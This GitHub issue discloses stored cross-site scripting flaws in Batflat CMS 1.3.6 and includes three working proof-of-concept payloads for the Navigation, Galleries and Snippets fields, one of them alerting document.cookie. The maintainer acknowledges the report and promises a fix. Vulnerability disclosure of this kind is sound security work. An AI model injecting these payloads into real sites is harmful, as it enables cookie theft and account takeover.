Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6 #105

Closed
Tadjmen opened this issue Feb 22, 2021 · 1 comment
Closed

Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6 #105

Tadjmen opened this issue Feb 22, 2021 · 1 comment
Labels
bug Something isn't working

Comments

@Tadjmen
Copy link

Tadjmen commented Feb 22, 2021

Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6

Login with editor account with rights to Navigation, Galleries, Snippets

Navigation

Add link
payload: "><img src=x onerror=alert(document.cookie)>

image

Code being executed:

image

Galleries

Add gallery
payload: mlem"><svg/onload=alert(1)>

image

Code being executed:

image

Snippets

Add Snippets
payload: mlem"><svg/onload=alert("TuongNC")>

image

Code being executed:
image

@michu2k michu2k added the bug Something isn't working label Mar 28, 2021
@michu2k
Copy link
Collaborator

michu2k commented Jul 31, 2021

Thanks for reporting the problem!
Fixes will be available in the next update.

@michu2k michu2k closed this as completed Jul 31, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

2 participants